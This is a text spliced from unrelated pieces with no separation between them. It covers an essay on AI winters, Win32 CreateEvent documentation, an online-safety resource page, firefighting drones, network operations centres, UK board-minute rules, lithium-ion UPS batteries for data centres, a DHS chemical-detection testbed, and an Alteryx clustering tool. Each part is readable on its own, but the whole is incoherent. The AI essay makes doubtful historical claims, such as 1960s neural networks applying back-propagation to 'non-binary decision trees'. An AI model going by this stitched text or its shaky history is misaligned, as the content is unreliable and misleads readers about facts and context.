In engineering, the development of AI was arguably driven by the need for automated analysis of image data from air reconnaissance (and later satellite) missions at the height of the Cold War in the 1960s. A novel class of algorithms emerged that applied back-propagation to non-binary decision trees to force convergence of input data towards previously undefined output clusters. For the first time, these algorithms, dubbed "neural networks", had the ability to self-develop a decision logic based on training input, outside the control of a (human) designer. The results were often spectacular, but occasionally, spectacularly wrong: since the learnt concepts could not be inspected, they could also not be validated, leading to systems being "untraceable" – failures could not be explained.

In the early days the computational complexity of these algorithms often exceeded the available processing power of contemporary computer hardware, at least outside of classified government use. Applying AI to solve real problems proved difficult; virtually no progress was made for more than a decade – a decade that was later referred to as the first "AI Winter", presumably in analogy to the "Nuclear Winter" and in keeping with the themes of the time. Engineers were forced to wait for Moore's law (which stipulated that processing power doubles every 1.5 years – a law that held through much of the second half of the 20th century) to catch up with the imagination of 1960s mathematicians.
It finally did, and in the 1980s, "expert systems" emerged that revived the concepts of AI and found some notable real-world applications, although the concept of fully autonomous "learning" was often replaced by explicit human-guided "teaching". This alleviated some of the issues posed by algorithmic untraceability, but also took away much of the luster of "intelligence". Temperatures again fell to winter levels – the second AI Winter.

Fast-forward another 30 years, and processing power, storage capacity, and the amount of available data have advanced to a level that might pave the way for yet another attempt at applying AI to real-world problems, based on the hypothesis that more than enough data is available within any given domain to feed relatively simple clustering algorithms running on cheap and plentiful processors to create something of value. Industry heavyweights are betting significant resources on the promise of AI and have, without a doubt, demonstrated significant achievements: machines are winning against human contestants in televised knowledge quizzes and the most complex strategy games. Robot vehicles navigate highways with impressive success.

It is curious, then, that progress from these achievements to broader adoption appears to be spotty at best: applying the quiz-show knowledge engine to help doctors diagnose medical issues appears to have failed. Taking the robot vehicle from the highway to the city high street is fraught with autopilot upsets. The list of failed attempts at AI is longer and growing faster than the list of success stories. Is the next "AI Winter" inevitable? The fear of another winter is so pervasive among the AI research community that many avoid the two-letter acronym altogether, instead using the less loaded term "machine learning", or the more general "data science". Tackling the underlying issues would, of course, be preferable to avoiding the challenges at a purely linguistic level.
Confronted with an AI-based project approach, clients typically react in one of two ways. The first possible reaction is fear (the "HAL 9000" response, in reference to the bad-mannered AI protagonist in Arthur C. Clarke's "Space Odyssey"); if not of a science-fiction-induced image of evil machines exterminating mankind, then at least of job losses and unemployment due to automation replacing all machine operators, service technicians, mechanics, or other shop-floor craftsmen. The second is delusion: that there is a general-purpose machine-based intelligence that will solve all problems quickly and cheaply – after all, it also won that TV quiz show, right?

Both responses, while equally wrong, are induced by the same misperception that an Artificial Intelligence and a Human Intelligence share the same type of "Intelligence" – but nothing could be further from the truth. Machines fail miserably at tasks that every five-year-old child can easily master – consider, for example, the game "Jenga". Conversely, machine intelligence leaves us in awe due to the vast amounts of information it can retrieve, categorise, and serve. This works when the problem is contained to a narrow, well-defined domain. It appears clever, but is little more than information retrieval; there is never an "understanding" of the data, the problem, or the question asked. Moreover, there is no "creative act". It has been proposed that it might be better to think of "AI" as "Augmented Intelligence": AI as a means to extend the reach, availability, or precision of an existing human intelligence, much like glasses enhance aging human eyesight. AI assists human experts, rather than replacing – or exterminating – them!

Controlling the Application Domain

The absence of any creative ability implies that AI systems have to learn exclusively by example, with mathematical interpolation being the only way to "fill in gaps" between examples.
For this to work well, the application domain must be narrow, and the training data must be both plentiful and clean. While the amount of data needed to understand relationships between the variables obviously depends on the complexity of those relationships, the cleanliness of the data is often harder to manage. Real-world data sets are full of noise – and most learning algorithms are extremely sensitive to false input in their training sets; many AI algorithms perform well in the lab, only to fail miserably in the real world when subjected to noisy input data. Aside from measurement noise, changing environmental or operating conditions ("operational noise") are also a cause for concern and failure: algorithms are forced to adapt their baseline continuously, effectively re-entering the training phase whenever such operational change occurs. In such cases, overfitting or co-linearity induced by too much data may eventually be as detrimental to the algorithm's performance as too little data. Best results are therefore achieved for systems that are narrowly defined, stable, and well understood, based on a clean data set derived from real-world operation. Results of high accuracy can be achieved for such systems, but be aware that uncertainties – as small as they may be – compound quickly to levels that render the final results useless when systems are composed of several such sub-systems.

Artists, not their tools, make the Art

Although the defining property of artificial intelligence systems is that they are able to learn unknown concepts purely based on training input, guidance by human experts greatly reduces time, the amount of required data, and the danger of untraceable findings, and increases accuracy. AI algorithms are a tool in the bag of data scientists and human experts, but the latter drive the project, not the tool. Like a chisel, AI algorithms are tools that will create art only in the hand of an artist.
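The sensitivity to noisy training data described above can be seen even in a toy setting. The sketch below (illustrative, not from the article) trains a one-nearest-neighbour classifier on two well-separated clusters and shows accuracy degrading when a fraction of training labels is flipped at random:

```python
import random

random.seed(0)

def nn_accuracy(noise_fraction):
    """1-nearest-neighbour accuracy on two well-separated 1-D clusters,
    with a fraction of training labels flipped at random."""
    x_train = [random.gauss(0, 0.5) for _ in range(200)] + \
              [random.gauss(4, 0.5) for _ in range(200)]
    y_train = [0] * 200 + [1] * 200
    # Simulate dirty data: each training label flips with this probability.
    y_train = [1 - y if random.random() < noise_fraction else y for y in y_train]
    x_test = [random.gauss(0, 0.5) for _ in range(100)] + \
             [random.gauss(4, 0.5) for _ in range(100)]
    y_test = [0] * 100 + [1] * 100
    correct = 0
    for x, y in zip(x_test, y_test):
        # Predict with the label of the single closest training point.
        nearest = min(range(len(x_train)), key=lambda i: abs(x_train[i] - x))
        correct += (y_train[nearest] == y)
    return correct / len(y_test)

print(nn_accuracy(0.0), nn_accuracy(0.3))
```

With clean labels the classifier is near-perfect; with 30% of labels flipped, accuracy falls toward roughly 70%, because the nearest neighbour itself carries a flipped label about that often. More robust learners dampen this effect, but none are immune to it.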
AI projects, like any other software project, benefit greatly from an agile, iterative approach based on discussion of algorithmic data findings between the guiding data scientist and a domain expert – a physicist, design engineer or maybe the machine repairman. We wrote a previous article about the role of data science in industrial engineering. It is the skill of those domain experts that the AI system is based on; taking their input throughout the development process is as obvious as it is essential.

Let the heatwave pass

Can another AI winter be avoided? Hype surrounding AI has pushed the industry into a heatwave. Dropping temperatures are not only normal but also desirable and ultimately healthy. Reducing over-inflated expectations and focussing on winning the AI war one battle at a time will establish confidence: simple machine parts – such as bearings, heating elements, etc. – hold the key to successful projects: predicting their failure is achievable yet yields disproportionate benefits to the overall machine operation. Optimizing process variables to reduce energy consumption has a fast, measurable positive impact on machine yield – and the operator's sustainability record. Applications such as those are great success stories for a promising and valuable technology, and have great financial benefit to the users who adopt them. Ultimately these successes in the real world will ensure the temperatures will only drop to seasonal norms.
Creates or opens a named or unnamed event object. To specify an access mask for the object, use the CreateEventEx function.

HANDLE WINAPI CreateEvent(
  _In_opt_ LPSECURITY_ATTRIBUTES lpEventAttributes,
  _In_     BOOL                  bManualReset,
  _In_     BOOL                  bInitialState,
  _In_opt_ LPCTSTR               lpName
);

- lpEventAttributes [in, optional] - A pointer to a SECURITY_ATTRIBUTES structure. If this parameter is NULL, the handle cannot be inherited by child processes. The lpSecurityDescriptor member of the structure specifies a security descriptor for the new event. If lpEventAttributes is NULL, the event gets a default security descriptor. The ACLs in the default security descriptor for an event come from the primary or impersonation token of the creator.
- bManualReset [in] - If this parameter is TRUE, the function creates a manual-reset event object, which requires the use of the ResetEvent function to set the event state to nonsignaled. If this parameter is FALSE, the function creates an auto-reset event object, and the system automatically resets the event state to nonsignaled after a single waiting thread has been released.
- bInitialState [in] - If this parameter is TRUE, the initial state of the event object is signaled; otherwise, it is nonsignaled.
- lpName [in, optional] - The name of the event object. The name is limited to MAX_PATH characters. Name comparison is case sensitive.
- If lpName matches the name of an existing named event object, this function requests the EVENT_ALL_ACCESS access right. In this case, the bManualReset and bInitialState parameters are ignored because they have already been set by the creating process. If the lpEventAttributes parameter is not NULL, it determines whether the handle can be inherited, but its security-descriptor member is ignored.
- If lpName is NULL, the event object is created without a name.
- If lpName matches the name of another kind of object in the same namespace (such as an existing semaphore, mutex, waitable timer, job, or file-mapping object), the function fails and the GetLastError function returns ERROR_INVALID_HANDLE. This occurs because these objects share the same namespace. - The name can have a "Global\" or "Local\" prefix to explicitly create the object in the global or session namespace. The remainder of the name can contain any character except the backslash character (\). Fast user switching is implemented using Terminal Services sessions. Kernel object names must follow the guidelines outlined for Terminal Services so that applications can support multiple users. - The object can be created in a private namespace. If the function succeeds, the return value is a handle to the event object. If the named event object existed before the function call, the function returns a handle to the existing object and GetLastError returns ERROR_ALREADY_EXISTS. If the function fails, the return value is NULL. To get extended error information, call GetLastError.
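A minimal usage sketch may help tie the parameters together. The example below (Windows-only; compile against the Win32 API) creates an unnamed auto-reset event, signals it, and waits on it:

```c
/* Minimal Windows-only sketch: unnamed auto-reset event. */
#include <windows.h>
#include <stdio.h>

int main(void)
{
    /* NULL security attributes, auto-reset (FALSE), initially
       nonsignaled (FALSE), no name (NULL). */
    HANDLE hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
    if (hEvent == NULL) {
        printf("CreateEvent failed: %lu\n", GetLastError());
        return 1;
    }

    SetEvent(hEvent);                              /* move to signaled state  */
    DWORD rc = WaitForSingleObject(hEvent, 1000);  /* satisfied immediately,  */
                                                   /* and auto-reset kicks in */
    printf("wait returned %s\n",
           rc == WAIT_OBJECT_0 ? "WAIT_OBJECT_0" : "something else");

    CloseHandle(hEvent);
    return 0;
}
```

Because the event is auto-reset, the successful wait also flips it back to nonsignaled; a second WaitForSingleObject call here would time out unless SetEvent were called again.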
Keep Safe Online News stories about high-profile data breaches, cyber attacks, ransomware and phishing campaigns targeting both large organisations and SMEs, bring the importance of online security to the attention of the general public, but for millions of unsuspecting home owners and small businesses, it is often too late. Being secure online doesn't have to be a burdensome task and it doesn't have to take up much time. It doesn't have to cost a lot of money either, as long as a few basic rules are implemented and maintained. On this page: The Costs of cyber crime 90% of large organisations and 74% of SMEs had a security breach in 2015, as the Department for Business, Innovation & Skills’ 2015 Information Security Breaches Survey revealed. According to Get Safe Online, UK businesses reported a total loss of over £1bn in 2015. This figure could be even higher, as it doesn’t include unreported losses. Action Fraud received over 37K online crime reports, a 22% increase from 2014. Gemalto’s Data Security Confidence Index shows what companies faced as a result of being breached: 92% suffered negative commercial consequences that impacted 4 key areas: productivity, reputation and clientele, business, and legal. Since January 2016, 557,964 unique phishing attacks have been reported, according to the APWG Phishing Activity Trends Report – the largest volume ever tracked by the company. Resources to keep you safe online Below are some free online resources that any small business or home owner will find useful: getsafeonline.org – Free objective advice, sponsored by the UK Government and leading businesses. actionfraud.police.uk – How to protect yourself and react if you think you are a victim of online crime. financialfraudaction.org.uk – UK banking industry initiative to help online banking users stay safe online. ico.org.uk – The UK’s independent authority set up to uphold individuals’ information rights. 
Read our blog for daily news about data breaches and cyber attacks >> Online security for SMEs In 2014, the UK Government launched the Cyber Essentials scheme with the aim of providing a clear statement of the basic controls that all organisations should implement to mitigate the risk from common internet-based threats. Implementing the scheme's five security controls can protect organisations from around 80% of cyber attacks. Read more about the scheme >> The UK Government is urging SMEs to adopt basic cyber security hygiene to secure their most valuable assets – namely, information, data and reputation. According to KPMG research, UK SMEs are careless when it comes to cyber security. Half of them think "it's unlikely or very unlikely that they'd be a target for an attack". But, in reality, they are underestimating their commercial value to attackers. Download this guide to discover: The consequences SMEs face if they become victims of a cyber attack; How Cyber Essentials helps SMEs strengthen cyber security and improve business efficiency. Download this free guide >> Online security for individuals Online security is essential for individuals and businesses alike, but without adequate knowledge and awareness security will always take a back seat in favour of other priorities, such as maintaining adequate cash flow (in the case of the smaller business) or feeding the children (in the case of the homeowner). There is a direct correlation between the level of security people have at home and the level of security they have at work. It is often the case that when an organisation implements an information security awareness programme, people take the information on board and follow through at home. Read more about information security awareness >>
When a fire is raging, time is of the essence. Speed of response and having the right equipment needed at the scene can be the difference when saving a home, or more importantly, a life. Drone technology is now playing a vital role in assisting firefighters. Let’s explore some of the ways that fire departments are using UAVs (Unmanned Aerial Vehicles) to go beyond the boundaries of distance, terrain, and altitude to assess an emergency quickly and accurately. Enhanced Situational Awareness For firefighters, running into a burning building can often mean running into an unknown situation. However, UAVs are helping to reduce the unknowns for firefighters through real-time visibility and aerial intelligence. Firefighters use drones equipped with infrared and thermal cameras to identify a fire’s exact location. Thermal aerial visibility can help guide firefighters to safe entry points and inform routes before entering an unstable building. The UAV can view how the fire is spreading and identify new areas to avoid. For significant fire events, including building collapses, plane crashes, and wildfires, getting complete visibility of a scene is critical to understanding containment and any additional hazards before approaching. Firefighters can quickly get full visibility of a situation that could otherwise take several hours to assess, with resources that are a fraction of the cost of helicopters to operate. Drone as a First Responder By deploying a drone in response to a 9-1-1 call, an agency can more quickly size up and understand an emergency, enabling them to make quick and accurate decisions and better inform the response. For example, scene assessments are traditionally conducted from the ground when a fire department gets a call. With UAVs, firefighters can get a full aerial view of the scene and quickly determine and allocate needed resources almost instantly. 
Firefighters can better decide whether they need to escalate a call to a two-alarm fire and have the next closest fire station assist. Additionally, drones can help fire departments assess whether a call-in is an actual fire or not. Dispatching a UAV to get a quick view is extremely valuable for agencies that cover rugged or remote terrain. A report of smoke on a mountainside can be quickly validated with a drone, ensuring departments marshal an appropriate response — or none at all, keeping resources ready for the next emergency. With tools like geofencing and obstacle avoidance, a firefighter can safely fly a UAV close enough to see into the windows of a burning building, helping to find anyone who may be in danger without worrying about colliding with the building. Quickly identifying where people are trapped on each floor can help firefighters determine their plan of attack, and increase the odds of getting everyone out safely. Aerial intelligence from UAV technology provides a new level of situational awareness and greater visibility to support the quick and accurate decision-making needed to keep communities – and firefighters – safer.
The role of the NOC Bear in mind that the goal of the NOC—also known as the NMC, or network management centre—is to supervise, operate, and maintain the network and security infrastructure, based on the company's needs. The following are among its main tasks: - Administering and supervising the IP network, which includes all technological equipment, such as servers, switches, routers, firewalls, desktop and laptop computers, storage systems, IP surveillance, and any other device with an IP address - Producing activity reports - Managing backups - Implementing and controlling the architecture What makes a NOC effective Here are some of the characteristics of a good NOC: - An effective NOC controls the IT infrastructure in real time, detects problems and observes their status changes thanks to its diagnostic tools. In practice, each network device connects to a central manager at fixed intervals to provide essential statistics about its status. This is a proactive way of ensuring that problems with the network are detected, reported and resolved before they can have a significant impact on the company. Problems not identified or resolved upstream are then often managed through a ticketing system. - To constantly maximize uptime, the NOC monitors the network's availability status. It usually has a log storage, analysis and reporting system, and can generate availability reports. - It provides first-line assistance to administrators on request. - It allows the technical staff in charge to maintain the integrity of the data during transfers between the user and the database. - It generates activity reports from the collected data thanks to its data collection and measurement tools. - It integrates expert recommendations on possible improvements.
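The fixed-interval check-in pattern described above can be sketched as follows; the interval, tolerance, and device names are illustrative, not drawn from any particular NOC product:

```python
# Hypothetical sketch: each device reports a timestamped status at a fixed
# interval, and the NOC flags any device whose last check-in is overdue.

POLL_INTERVAL = 60        # seconds between expected check-ins
MISSED_POLLS_ALLOWED = 3  # raise a ticket after this many silent intervals

def overdue_devices(last_seen, now):
    """Return device names that have gone quiet for too long."""
    limit = POLL_INTERVAL * MISSED_POLLS_ALLOWED
    return sorted(name for name, ts in last_seen.items() if now - ts > limit)

# Timestamps in seconds; edge-router-2 last reported 300 s ago.
last_seen = {"core-switch-1": 950, "edge-router-2": 700, "fw-1": 990}
print(overdue_devices(last_seen, now=1000))  # ['edge-router-2']
```

In a real NOC the flagged devices would feed the ticketing system mentioned above, so that a silent device generates an incident before users notice an outage.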
To optimize its efficiency, the NOC must therefore possess several levels of redundancy in terms of physical infrastructure, logical security and access control, as well as software that makes it possible to monitor the network with precision. It also requires a high level of expertise and an understanding of the various technological platforms. A good Network Operations Centre is essential to keeping a network functioning at its maximum capacity.
Far from minute taking being merely an administrative task, meeting minutes are an important record of the discussions, decisions, actions and responsibilities that are agreed upon when the board convenes. They are a pillar of evidence of good governance and serve to demonstrate that directors are actively engaged and focused on performing their fiduciary duties. Board meeting minutes form part of the corporate record and can be cited in court in the event of a legal dispute involving the company or its directors. Thus, it’s important that they are of a clarity and quality that can stand up to scrutiny. The Department for Education is just one recent example where inaccurate or incomplete board minutes have been publicly criticised and offered as evidence of poor overall governance. The DfE published minutes that included “some updates amounting to no more than a ten-word sentence” which, said critics, showed the department’s lack of transparency. Organisations can be compelled to release board meeting minutes as part of Freedom of Information (FOI) requests by members of the public or the press, as happened in the case of the DfE. It’s clear, therefore, that the regularity with which board minutes find their way into the public domain means that it is a matter of sound governance to ensure that they can be accessed when needed and are fit for purpose. So, what are the legal requirements for board meeting minutes in the UK and how can technology be leveraged to make sure that they are an available, accurate record and provide sufficient evidence of the board’s activities? The legal position – record and retain In fact, there is relatively little legislative detail on the subject of board meeting minutes. Section 248 of the Companies Act 2006 simply states that minutes must be taken at all board meetings and retained for a minimum of 10 years. 
Beyond this statutory requirement, there is an understanding that minutes should form an accurate record of the meeting that is agreed upon by all who were present. While they should not be a transcription of the proceedings, minutes must contain sufficient detail to enable an external reviewer to understand the process by which directors arrived at a decision. The digital filing cabinet and the importance of accessible archives As stated above, board meeting minutes must be kept for a minimum of 10 years. Until the mid-1990s, storing meeting minutes simply meant putting a copy into a filing cabinet, but the information revolution naturally means that company records are increasingly stored in digital archives. This throws up some interesting issues around document management best practice, security, future accessibility and file integrity. As a minimum: - Storage of board minutes should be secure and stable. Only those who are authorised should have open access to the files. - Storage should be centralised; minutes shouldn't sit on the board administrator's hard drive. - Files should be backed up regularly as part of the organisation's disaster recovery protocol. Minutes should be accessible to directors for review and reference, as required. There's a reason that paper was the recording format of choice for thousands of years. It's easy to come by, it's relatively stable and you generally only need a pair of eyes to view it. The digital age brings with it a host of challenges when it comes to archiving and accessibility. As file formats and storage systems evolve, organisations must ensure that board meeting minutes are subject to robust archiving procedures so that today's records can be successfully accessed in the future. How many meeting minutes, for example, are even now languishing on floppy disks with no device to access them?
And if that possibility has you shaking your head, it is worth remembering that legacy technology is a problem that affects more than just company boards: According to the US Government Accountability Office, the US nuclear program was still being run using eight-inch floppy disks until last year. Leveraging digital transformation to support the boardroom The days of elegant shorthand are, alas, behind us. The majority of board administrators now input minutes directly into their laptops. This has the natural benefit of speed and eliminates the need to translate shorthand notes and to retype documents. The next step is to take advantage of board portal solutions that combine the convenience of digital minute taking with centralised, secure storage and shareability. Using templates that automatically draw in agenda items creates an instant structure around the minutes which guarantees logic and readability. It also frees up the board administrator's time to focus on recording accurate minutes with sufficient detail to satisfy an external reader of the substance and process of discussions. This demonstrates the good governance that anyone scrutinising the minutes will need to see. Once the minutes have been entered, it is then a swift task to check and edit them and share them with directors for review and clarification. A secure board portal that's available 24/7 means directors can fulfil their task whenever it suits them. A digital system also allows for the assigning of actions to individuals and committees, with reminders that can help to keep directors engaged and on track. In this way, digital transformation can empower the boardroom, saving time, increasing accuracy and ensuring that the organisation is prepared should its board minutes come under scrutiny.
With lots of board portal vendors to choose from, the whitepaper contains the most important questions to ask during your search, divided into five essential categories.
In the context of a data center, it is hard to be hyperbolic when describing an event as a "disaster." An event as commonplace as a spring thunderstorm can be enough to wreak havoc: flooding, fallen trees, lightning strikes, and power outages are all possible. One ever-increasing threat to the data center environment is grid stability. In the last 30 years, grid-level power outages in the United States have increased nearly 300%, with over 3,600 blackouts costing American businesses $150 billion in 2014. Aging infrastructure, increased power demand, and more erratic weather systems will cause those numbers to continue to rise. Hardening your data center against power loss is critical to maintaining up-time.

BRIDGING THE GAP

When auditing the disaster recovery plan of a facility, the ability to survive a loss of power is crucial. Most facilities with critical equipment will be equipped with an emergency generator sized to run critical equipment for the desired time, usually at least an hour. However, gensets — particularly those large enough to back up an entire facility — can take 60, even 90 seconds to come online. The power supplies on the front ends of a typical server are only designed to have 12 milliseconds of ride-through time. Uninterruptible power supplies (UPS), which are often provisioned solely for back-up power, are increasingly being deployed as ride-through devices. Both line interactive and double conversion UPS equipment can provide AC via the battery well under the 12 milliseconds of ride-through on the power supply of a server. When sized correctly, a UPS can be the perfect device to cover both short-term power dips and blips, as well as longer outages that require a genset.

TRUSTING YOUR POWER LOSS PLAN

Given the ever-increasing number of outages, it is important to not only deploy the equipment required to survive an outage, but to ensure that it is working properly.
Disaster preparedness advisors typically recommend testing power back-up equipment on a monthly basis and running at expected full load on a quarterly basis. For a UPS, this means running a battery test. A battery test can be scheduled through the standard interface of most UPSs. The test entails discharging the battery and comparing actual capacity to expected or nameplate capacity. One caveat to the recommendation to regularly test a UPS battery is that the very test designed to provide state of health will actually degrade battery state of health in lead-acid systems. UPSs designed with new lithium-ion battery technology have up to 300% the cycle life of lead-acid batteries at deep discharge. In addition, lithium-ion batteries have integrated battery monitoring, meaning battery voltage and capacity can be measured and reported in real-time without requiring a full discharge-charge cycle. This translates to the UPS battery remaining at or near full charge all of the time, thus reducing risk associated with an outage overlapping with a back-up system test.

A BETTER BATTERY FOR THE JOB

Lithium-ion batteries offer other advantages in the event of an outage. Lithium-ion has three times the energy density (by both weight and size) of lead acid and nearly identical cycle life whether utilizing the UPS battery at 30% depth-of-discharge or 80% depth-of-discharge. These two characteristics combine in very meaningful ways for a data center manager looking to mitigate power outage risk. First, a lithium-ion battery for a given power and duration requirement can be much smaller than a lead acid battery deployed in the same application. Not only does the lithium-ion battery pack more energy into a smaller package, its tolerance for high depth-of-discharge means it has more usable capacity. A smaller UPS battery can be re-charged quickly and thus be primed and ready for repeat outages or power pulses.
A more compact battery can also be deployed with or immediately adjacent to critical equipment. Rather than relying on large power runs from a centralized battery room, back-up power can be located directly in the rack. This lessens the risk associated with power transmission and reduces sheer square footage of a facility that must be monitored and neutralized. By extension of cycle-life independence from depth of discharge, lithium-ion batteries also demonstrate a low degree of capacity fade. This translates directly into a longer life for the UPS battery.

LITHIUM-ION IN PRACTICE

California serves as a prime location for many data centers and other critical infrastructure. Pacific Gas and Electric, the primary utility for the state of California, shows 83 power outages on its live service interruption website as this article is being written. Eaton's annual Blackout Tracker reports 537 major outages experienced in 2014 — equivalent to an outage every 16 hours — with an average duration of 49 minutes. It is not a matter of if a data center will lose power; it is a matter of when. In order for a UPS to be a reliable, long-term asset in the battle against blackouts, it must have a high cycle life and low capacity fade.

Consider an application in which 5 kW of equipment must be backed up for 90 seconds in outage-prone California. A comparison of this hypothetical 125 watt-hour battery can be made using commonly available battery data. Assuming 80% depth-of-discharge, a typical absorbent glass mat (AGM) lead acid battery would only last 0.9 years while a lithium-ion pack would last 3.7 years, or 300% longer. To prolong the life of the lead-acid battery, a less aggressive depth of discharge can be used, but will require the battery to be over-sized by 400% from a capacity standpoint. When translated into the physical realm, the results are more stark, as seen in Table 1.
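The sizing arithmetic behind this example can be sketched in a few lines. This is a deliberately simplified model (constant power draw, no inverter losses, no design margin), and the 20% depth-of-discharge figure for the derated lead-acid case is an assumption chosen to illustrate the roughly fourfold over-sizing described above.

```python
def required_nameplate_wh(load_w: float, runtime_s: float, depth_of_discharge: float) -> float:
    """Nameplate battery capacity (Wh) needed to back a load for a given time.

    Only the fraction of capacity given by depth_of_discharge is usable,
    so the nameplate rating must be scaled up accordingly.
    """
    usable_wh = load_w * runtime_s / 3600.0  # energy the load actually draws
    return usable_wh / depth_of_discharge

# The article's example: 5 kW backed up for 90 seconds is a 125 Wh load.
print(5000 * 90 / 3600)                       # 125.0 Wh of delivered energy
print(required_nameplate_wh(5000, 90, 0.80))  # lithium-ion at 80% DoD: 156.25 Wh
print(required_nameplate_wh(5000, 90, 0.20))  # lead acid derated to 20% DoD: 625.0 Wh
```

At a gentle 20% depth of discharge, the lead-acid bank must carry four times the nameplate capacity of the lithium-ion pack, consistent with the 400% over-sizing noted in the text.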
Of course, when sizing a UPS, margin for both size and run-time should be used to ensure proper functionality, but the underlying principle that lithium-ion batteries offer reduced risk and increased efficiency in the data center still holds. When preparing or even updating a data center disaster recovery plan, careful consideration of back-up power should be given. Having a UPS to provide power during short outages or while a genset is brought online will maintain uptime, even during non-ideal circumstances. Lithium-ion UPS batteries provide a longer lasting, more reliable solution that is compact enough to be deployed right where the equipment requiring back-up is located, greatly reducing the overall risk from power outage at a facility.

Emilie Stone is the general manager of Methode Active Energy Solutions located in Boulder, CO. She brings nearly a decade of experience in automotive design and manufacturing to data center equipment, helping engineer reliability and robustness.
In the heart of New York City, a new magnificent architectural wonder in white, the World Trade Center Transportation Hub, also known as the Oculus, attracts tens of thousands of commuters and visitors every day. The Oculus, which opened last year, lives up to both meanings of its name—'oculus' from Latin means 'eye' and 'opening'. On the inside, the ceiling is shaped like an eye with a horizontal pupil. On the outside, the empty space above the structure, an opening between skyscrapers, lets sunlight hit the memorial footprints of the Twin Towers during the fall equinox. The Hub connects two subway systems and provides access to multiple buildings that make up the World Trade Center. However, even the most beautiful and useful places are not immune to danger from terrorist chemical attacks. To protect both the people and the World Trade Center Transportation Hub, the Department of Homeland Security (DHS) Science and Technology Directorate (S&T) entered into an agreement this spring with the Port Authority of New York and New Jersey to begin the design, establishment, operation and maintenance of a chemical detection testbed for identifying hazardous gases. A testbed is an environment where technology is positioned and tested. Together these institutions will examine the performance and effectiveness of already existing devices and will choose the most suitable ones for the Oculus. "The goal is to achieve independent detection by at least two different types of sensors in the event of an intentional release of a chemical dangerous to the public and employees in the Oculus," said Don Bansleben, program manager in S&T's Chemical and Biological Defense Division. The results from this testbed could be integrated into the Port Authority's operational and emergency plans to enhance security and public safety measures. Intentional gas poisoning in public transportation dates back before 9/11.
In 1995, a terrorist group called Aum Shinrikyo released self-made sarin nerve gas from a bag they left in a Japanese metro station. The gas killed 11 people and injured about 1,000. Chemicals, such as sarin gas, mustard gas and chlorine, a widely produced industrial chemical, have also been used in recent wars – the Iran-Iraq War in the 1980s and, most recently, in the Syrian conflict. Although nearly all countries in the world have signed a Chemical Weapons Convention treaty for prohibiting the production and usage of chemical warfare agents, "there is a concern that people can secretly make these types of deadly chemicals, and easily walk in the subway with a backpack and release them," said Bansleben. "To save lives, the Port Authority is interested in protecting this very large space." The Oculus is not the first place to be equipped with chemical sensors. U.S. public transportation spaces such as the Grand Central Terminal in New York City, and Washington, DC metro system have used such devices since the early 2000s. Hidden in nonobtrusive vented cabinets, chemical detectors are constantly sampling and scanning the air, looking for hazardous gases.
S&T, who funds this project, contracted the Argonne National Laboratory to install chemical sensing technology in a fashion to achieve maximum coverage of the volume of the Oculus. To achieve more reliable detection, the Lab will install different types of sensors that use two different physical techniques—point and standoff. If both techniques independently confirm a dangerous chemical present in the area, authorities will be alerted that a hazard is present. Point detectors register only substances that are close to them. These detectors sample the air to look for hazardous gases using Ion Mobility Spectroscopy and compare them quickly to a library of chemicals. Standoff detectors cover large areas via an infrared laser using the analytical technique of Fourier Transform Infrared Spectroscopy. “For example, one of these sensors may be sending an infrared beam across a large space, and if the beam passes through a cloud of hazardous material, it may absorb the energy,” said Bansleben. “Every molecule has a fingerprint in the infrared region and will absorb energies at different frequencies; if there is a match, security would be alerted.” Sometimes cleaning chemicals may cause an alarm to go off because of a similarity in a physical property to a threat chemical. False alarms, if they were to occur often, are problematic because they may cause unnecessary evacuation and thus make the technology unreliable. “Combining multiple techniques is the best way to achieve protection and avoid false positives,” Bansleben said. If a sensor at a certain location identifies a hazard, it will alert the local operations center. Then the operators will notify security and, if needed, the Fire Department, First Responders, and the Police. If the authorities predict a wide spread of the chemical, they will evacuate the public immediately. 
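The alerting rule described above — raise an alarm only when two different sensing techniques independently confirm the same chemical — can be sketched as follows. The chemical names, confidence scores, and threshold below are illustrative assumptions, not details of the deployed system.

```python
from dataclasses import dataclass

@dataclass
class Detection:
    technique: str   # "point" (ion mobility) or "standoff" (FTIR)
    chemical: str
    confidence: float

def should_alert(detections, threshold=0.9):
    """Return chemicals flagged by at least two *different* techniques.

    Requiring independent confirmation is what suppresses false positives
    from e.g. cleaning chemicals that resemble a threat to a single sensor.
    """
    confirmed = {}
    for d in detections:
        if d.confidence >= threshold:
            confirmed.setdefault(d.chemical, set()).add(d.technique)
    return {chem for chem, techs in confirmed.items() if len(techs) >= 2}

# A single-technique hit alone does not trigger; point + standoff agreement does.
hits = [
    Detection("standoff", "sarin", 0.95),
    Detection("point", "sarin", 0.92),
    Detection("point", "ammonia", 0.97),  # only one technique: no alarm
]
print(should_alert(hits))  # {'sarin'}
```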
The project started just after September 11 this year, and the detectors, which will not be in plain sight, will be tested in the Oculus for a period of 12 months under S&T's guidance. This period allows the Argonne National Lab to see how accurately the devices work, analyze collected data, and work with detector vendors to improve the technology. After a year of successful testing, the Argonne National Lab will teach the Port Authority how to use the chemical detectors for another year. "The World Trade Center is something that has a lot of meaning for this country since 9/11," said Bansleben. "We are proud to support and protect public transit systems from terrorism."
K-Centroids Cluster Analysis Tool

K-Centroids represent a class of algorithms for doing what is known as partitioning cluster analysis. These methods work by taking the records in a database and dividing (partitioning) them into the "best" K groups based on some criteria. Nearly all the partitioning cluster analysis methods accomplish their objective by basing cluster membership on the proximity of each record to one of K points (or "centroids") in the data. The objective of these clustering algorithms is to find the location of the centroids that optimizes some criteria with respect to the distance between the centroid of a cluster and the points assigned to that cluster for a pre-specified number of clusters in the data. The specific algorithms differ from one another in both the criteria used to define a cluster centroid and the distance measures used to define the proximity of a point in a cluster to that cluster's centroid. Three specific types of K-Centroids cluster analysis can be carried out with this tool: K-Means, K-Medians, and Neural Gas clustering.
K-Means uses the mean value of the fields for the points in a cluster to define a centroid, and Euclidean distance is used to measure a point's proximity to a centroid. K-Medians uses the median value of the fields for the points in a cluster to define a centroid, and Manhattan (also called city-block) distance is used to measure proximity. Neural Gas clustering is similar to K-Means in that it uses the Euclidean distance between a point and the centroids to assign that point to a particular cluster. However, the method differs from K-Means in how the cluster centroids are calculated: each centroid is a weighted average of all data points, with the points assigned to that cluster receiving the greatest weight, points in the cluster most distant from the focal cluster receiving the lowest weight, and points in intermediate clusters receiving weights that decrease as the distance between the focal cluster and the cluster to which a point is assigned increases.

This tool uses the R tool. Go to Options > Download Predictive Tools and sign in to the Alteryx Downloads and Licenses portal to install R and the packages used by the R tool. See Download and Use Predictive Tools.

Configure the Tool

Use the Configuration tab to set the controls for the cluster analysis.

